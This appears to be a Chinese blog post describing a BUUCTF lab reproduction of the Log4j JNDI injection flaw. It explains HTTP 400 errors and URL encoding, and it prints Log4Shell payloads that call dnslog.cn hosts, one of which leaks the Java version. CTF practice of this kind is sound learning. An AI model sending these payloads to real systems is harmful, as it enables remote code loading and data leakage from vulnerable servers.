buuctf漏洞复现之log4j

前言:

发现自己不会挖掘漏洞,遂学习常见漏洞复现

思考:

什么是log4j,是apache下的java应用常见的开源日志库,也就是java语言,中间件为apache

内容:

{jndi:ldap://{sys:java.version}.gf3q2v.dnslog.cn}

dnslog获取的域名

发现有传入参数,于是在网上找了可以传入dnslog的域名

{jndi:ldap://{sys:java.version}.gf3q2v.dnslog.cn

但是400错误了,于是在网上找了400错误是什么。那就是服务器处理不了的请求,

参考解析HTTP错误码400 Bad Request及其常见原因与解决方法-CSDN博客

复制代码
1xx:信息,表示服务器已接收到请求并且正在处理。
2xx:成功,表示服务器成功处理了请求。
3xx:重定向,表示需要进一步操作以完成请求。
4xx:客户端错误,表示服务器无法处理请求。
5xx:服务器错误,表示服务器在处理请求时发生了错误。

我在网上好像看到答案了,说是400错误是由于,客户端传输过程中进行解码了

我的猜想是对的,但是不是用那个payload解的,

发现那个payload也可以,我看网上多写了空格!!!也是需要url编码的

推荐网站CTF在线工具-CTF工具|CTF编码|CTF密码学|CTF加解密|程序员工具|在线编解码

{jndi:ldap://{sys:java.version}.gf3q2v.dnslog.cn}

是用这个${jndi:ldap://xyr4kk.dnslog.cn}

但是要编码,编码之后为

复制代码
%24%7Bjndi%3Aldap%3A//xyr4kk.dnslog.cn%7D
相关推荐
凭君语未可2 天前
详解Maven的主要生命周期
java·log4j·maven
WIN赢3 天前
单元测试的编写
单元测试·log4j
zerohawk6 天前
【log4j】配置Slf4j
junit·单元测试·log4j
熬了夜的程序员9 天前
Go 语言封装邮件发送功能
开发语言·后端·golang·log4j
故事与他64510 天前
Apache中间件漏洞攻略
java·服务器·安全·网络安全·中间件·log4j·apache
江沉晚呤时12 天前
精益架构设计:深入理解与实践 C# 中的单一职责原则
java·jvm·算法·log4j·.netcore·net
为美好的生活献上中指13 天前
java每日精进 3.21 【SpringBoot规范2.0】
java·开发语言·spring boot·log4j·async·mail
-$_$-14 天前
【MyDB】5-索引管理之4-单元测试
单元测试·log4j
爱的叹息18 天前
java自带日志系统介绍(JUL)以及和Log4j 2、Logback、SLF4J不同日志工具的对比
java·log4j·logback
热心小张23 天前
Springboot单元测试
spring boot·单元测试·log4j